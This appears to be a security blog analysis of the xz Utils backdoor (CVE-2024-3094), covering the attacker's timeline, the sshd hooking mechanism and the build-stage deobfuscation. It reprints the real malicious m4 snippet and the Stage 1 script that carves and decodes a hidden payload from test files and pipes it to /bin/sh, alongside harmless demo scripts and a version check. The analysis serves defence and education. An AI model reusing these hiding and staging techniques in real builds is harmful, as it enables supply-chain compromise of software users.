Emil Ahmadov 01 Apr 2024

XZ Backdoor: CVE-2024-3094

Introduction

Researchers unveiled the discovery of a backdoor intentionally embedded in xz Utils, an open-source data compression tool widely utilized across Linux and Unix-like operating systems. The individuals or group behind this project likely invested years into its development, bringing it perilously close to being incorporated into Debian and Red Hat, the two predominant Linux distributions. However, vigilant software developers detected something amiss before the backdoor update could be merged.

Description

The backdoor code resided within the compromised liblzma library, which handles file compression tasks. On affected distributions the OpenSSH server (sshd) loaded liblzma indirectly, because distribution patches link sshd against libsystemd, which in turn depends on liblzma. This gave the malicious code a foothold inside the sshd process, from which it could interfere with authentication.

Specifically, published analyses indicate that the malicious code used glibc's indirect function (ifunc) mechanism to run early during process startup and redirect RSA_public_decrypt, a function sshd calls while verifying keys. From that position it could inspect the data a connecting client supplied during public-key authentication and decide when to intervene.

The backdoor did not alter passwords or other user-supplied credentials. Instead, the hooked function checked whether the client's data carried a payload signed with the attacker's private key. If it did, the backdoor acted on the attacker's instructions before authentication completed; otherwise it handed control to the original function, so ordinary logins kept working and nothing looked out of place.

Ultimately, this malicious meddling with the authentication process created a potential loophole for the attacker to gain unauthorized remote access to the system. This access could then be leveraged for data theft, malware deployment, or further compromise of the system.

Timeline of Events:

2021: JiaT75 creates a GitHub account. Their initial commits to other projects (like libarchive) are suspicious and potentially introduce vulnerabilities. This suggests early malicious intent.

2022: JiaT75 submits a seemingly innocuous patch to xz via email. A new persona, Jigar Kumar, pressures the project maintainer to merge it. Jigar Kumar and another similarly obscure account pressure the maintainer for more control within the project, then disappear. JiaT75 begins regularly contributing to xz, gaining trust over time.

2023: JiaT75 becomes a trusted maintainer in January. In March, they change the contact email for Google's oss-fuzz (a security testing system) to their own. They introduce changes to the codebase related to 'ifunc' implementation, potentially to obscure the backdoor they will later insert.

2024: JiaT75 influences the xz project URL within oss-fuzz and adds the final malicious code disguised as routine test files. This code is designed to exploit the OpenSSH server's authentication process.

This was a well-orchestrated, long-term attack. The threat actor meticulously built a position of trust within the open-source project. They strategically manipulated testing infrastructure to mask their malicious changes from detection. The attack targeted the xz compression library but had the potential to compromise systems using OpenSSH for remote login.

Discovery

Bash-Stage Obfuscation

Extracting & Executing the Hidden Payload

Obfuscation of the initial payload begins within the m4/build-to-host.m4 file. Data is extracted from the test file tests/files/bad-3-corrupt_lzma2.xz.

 ...
 gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
 ...
 gl_path_map='tr "\t \-_" " \t_\-"'
 ...

Simple byte-level character substitution (tr command) is performed to reverse intentional corruption of the file. This corruption likely aimed to disguise the payload as a harmless error. The restored xz stream is decompressed.

0x09 (\t) is replaced with 0x20,
0x20 (space) is replaced with 0x09,
0x2d (-) is replaced with 0x5f,
0x5f (_) is replaced with 0x2d.

This actually "uncorrupts" the bad-3-corrupt_lzma2.xz, which forms a proper xz stream again.
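
The byte swap can be tried on harmless text. The sketch below reuses the tr arguments quoted from build-to-host.m4; the function name swap_bytes and the sample string are made up for illustration, and GNU tr is assumed. Because each pair of bytes is simply exchanged, running the swap twice returns the original input, which is why the same mapping can both "corrupt" and "uncorrupt" a file.

```shell
#!/bin/sh
# Apply the same byte swap as the gl_path_map snippet:
# tab <-> space and '-' <-> '_'.
# swap_bytes is a hypothetical helper name, not part of the backdoor.
swap_bytes() {
    tr "\t \-_" " \t_\-"
}

sample='a-b_c d'

# One pass exchanges the four bytes.
once=$(printf '%s' "$sample" | swap_bytes)

# A second pass undoes the first, since the mapping is its own inverse.
twice=$(printf '%s' "$once" | swap_bytes)

printf 'once:  %s\n' "$once"
printf 'twice: %s\n' "$twice"
```
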

The payload was carefully hidden within a seemingly corrupt test file, demonstrating the attacker's emphasis on obfuscation.

This is merely the first stage of the backdoor. The Stage 1 script likely initiates further extraction, decryption, or execution of additional malicious code components.

Payload Segmentation & Extraction

####Hello####
# a few binary bytes here, but as it's a comment they are ignored
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) &&
 head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
 head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
 head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
 head -c +2048 && (head -c +1024 >/dev/null) &&
 head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
 head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
 head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
 head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
 head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";
(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|
tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

The `head -c +1024 >/dev/null` command effectively discards the first 1024 bytes of the `good-large_compressed.lzma` file. These bytes likely contain dummy data or additional obfuscation.

The script alternates between:

Discarding 1024 bytes (head -c +1024 >/dev/null)
Extracting and passing the subsequent 2048 bytes to the next step for processing.

Payload Structure: This suggests the malicious payload is strategically segmented across the file, interspersed with either filler data or further obfuscation to avoid detection.
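
The alternating discard/keep pattern is easier to see at a smaller scale. The following is a minimal sketch, not the attacker's script: it skips 3 bytes and keeps 6 instead of 1024 and 2048, the function name carve and the input string are invented, and it assumes a head implementation (such as GNU coreutils) that reads no more than the requested number of bytes from a pipe, so each head call resumes where the previous one stopped.

```shell
#!/bin/sh
# Scaled-down carving: skip 3 bytes, keep 6 bytes, twice.
# carve is a hypothetical name; the real script chains 1024/2048-byte steps.
carve() {
    { head -c 3 >/dev/null && head -c 6 &&
      head -c 3 >/dev/null && head -c 6; }
}

# 'xxx' stands in for filler; the remaining bytes stand in for payload.
carved=$(printf 'xxxPAYLOAxxxD-BYTE' | carve)

printf 'carved: %s\n' "$carved"
```

All the head invocations share one standard input, so the filler between the kept segments is consumed and thrown away while the kept segments are concatenated on standard output.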

Visual Analogy: The provided visual with 'noisy' areas representing payload data and 'empty gray' areas representing filler/obfuscation helps to understand the extraction process.

The deliberate segmentation of the payload within the file demonstrates the attacker's continued efforts to mask the malicious code. This step meticulously extracts the payload segments from within the file, preparing them for the next phase of the backdoor's execution.

Payload Decryption & Preparation

Isolating the Payload: The tail -c +31233 command (with a slight byte count variation between xz versions) removes the initial portion of the extracted data. This discarded section conceals the binary backdoor, which will be retrieved in a later stage.
Simple Decryption: The tr command functions as a basic substitution cipher. Different keys (byte mappings) are used for xz versions 5.6.0 and 5.6.1. This step reverses a layer of obfuscation applied to the payload.
Preparing for Execution: The decrypted data is decompressed (xz -F raw --lzma1 -dc), yielding the Stage 2 script. This script is immediately executed, advancing the backdoor's operation.
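
The substitution step can be examined in isolation. The sketch below uses the byte mapping quoted in the Stage 1 script; the names KEY, decode and encode are illustrative, and the encode direction is only an assumption about how the data was prepared, obtained by swapping the two tr arguments. The six ranges in the mapping together cover all 256 byte values exactly once, so the mapping is a permutation and can be reversed.

```shell
#!/bin/sh
# Byte mapping quoted in the Stage 1 script (the variant with tail -c +31233).
KEY='\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113'

# Decode: the N-th byte listed in KEY becomes byte value N.
decode() { LC_ALL=C tr "$KEY" '\0-\377'; }

# Assumed inverse: byte value N becomes the N-th byte listed in KEY.
encode() { LC_ALL=C tr '\0-\377' "$KEY"; }

# 'L', 'M', 'N' are octal 114, 115, 116, the first three bytes of KEY.
# od prints the decoded bytes as decimal numbers; xargs trims the spacing.
first_three=$(printf 'LMN' | decode | od -An -tu1 | xargs)
printf 'L M N decode to: %s\n' "$first_three"

# Encoding and then decoding should give back the input unchanged.
roundtrip=$(printf 'hello' | encode | decode)
printf 'round trip: %s\n' "$roundtrip"
```
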

The initial portion of the segmented file is deliberately discarded, ensuring only the required payload remains for the next stage. A basic substitution cipher is used to conceal the payload. While simple, it demonstrates the attacker's continued efforts to mask their malicious code.

Stage Advancement: This process carefully prepares Stage 2 of the backdoor for execution.

Stage 2: Manipulating the Compilation Process

Core Payload: The Stage 2 operation primarily resides within the "infected.txt" file (specifically the 5.6.0 version). This bash script contains the code that manipulates the xz compilation process.

Key Actions: Though the script would be complex, its likely actions include:

Extracting a .o File: A pre-compiled object file (liblzma_la-crc64-fast.o) is hidden within the test-file data and extracted by the script. This object file contains the core malicious code for the backdoor.

Interfering with Compilation: The script modifies the compilation or linking process of xz, forcing the inclusion of the malicious object file during linking and altering build settings to enable the backdoor's functionality in the compiled output.

The central goal of Stage 2 is to ensure that the malicious backdoor code is compiled directly into the liblzma library built from the xz sources. This allows the attacker's code to execute whenever a process such as sshd loads the compromised library, enabling unauthorized access through the OpenSSH authentication path.

Note: Embedding the malicious code within an object file allows it to blend seamlessly into the legitimate xz compilation process. The script manipulates the build process rather than directly replacing core xz files. This likely helps evade detection.

Please note: Without access to the actual "infected.txt" file, a more precise explanation is challenging.

Sophisticated Obfuscation: The attacker meticulously disguised the backdoor:

Payload hidden within test files.
Segmentation and file carving techniques to extract it.
Simple but effective substitution ciphers.
Multi-stage execution for heightened obscurity.

Tool Ingenuity: Using standard command-line tools in a creative way demonstrates resourcefulness and potential to evade detection by many automated scanners.

Extensibility: The backdoor's design hints at the possibility of future updates or additions without needing to modify the core test files, making it more adaptable.

The Unanswered Question: The discovery of this well-crafted attack poses a chilling question: if this was found by chance, what other hidden threats might still exist out there, lurking within seemingly innocent open-source code? This incident serves as a stark reminder of the following:

The Importance of Vigilance: Even widely-used open-source software must be subjected to continuous scrutiny.
The Challenge of Detection: Sophisticated threat actors can craft attacks that blend seamlessly with legitimate code.
The Need for Proactive Security: Proactive review processes, contributor verification, and advanced detection tools are crucial to mitigate future risks in the open-source landscape.

Detecting the Vulnerability

https://github.com/FabioBaroni/CVE-2024-3094-checker/blob/main/CVE-2024-3094-checker.sh
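
As a first, coarse check, the installed xz version can be compared against the two releases discussed in this article, 5.6.0 and 5.6.1. The following is a minimal sketch under that assumption and is not a substitute for the checker linked above; the function name is_backdoored_version is made up here, and the script only reads the version string that xz reports about itself.

```shell
#!/bin/sh
# Succeed (exit status 0) if the given version string is 5.6.0 or 5.6.1,
# the two releases this article discusses as carrying the backdoor.
# is_backdoored_version is a hypothetical helper name.
is_backdoored_version() {
    case "$1" in
        5.6.0|5.6.1) return 0 ;;
        *)           return 1 ;;
    esac
}

# Report on the locally installed xz, if there is one.
if command -v xz >/dev/null 2>&1; then
    # The first line of `xz --version` ends with the version number.
    installed=$(xz --version | head -n 1 | awk '{print $NF}')
    if is_backdoored_version "$installed"; then
        echo "xz $installed: affected release, update or downgrade"
    else
        echo "xz $installed: not one of the two releases checked here"
    fi
else
    echo "xz not found on PATH"
fi
```

A version match only indicates that the release is one of the affected ones; whether the backdoor was actually built in depends on how the package was built, which the linked checker examines in more detail.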

References:

https://www.tenable.com/blog/frequently-asked-questions-cve-2024-3094-supply-chain-backdoor-in-xz-utils

https://boehs.org/node/everything-i-know-about-the-xz-backdoor

https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27

https://www.helpnetsecurity.com/2024/03/29/cve-2024-3094-linux-backdoor/

https://gynvael.coldwind.pl/?lang=en&id=782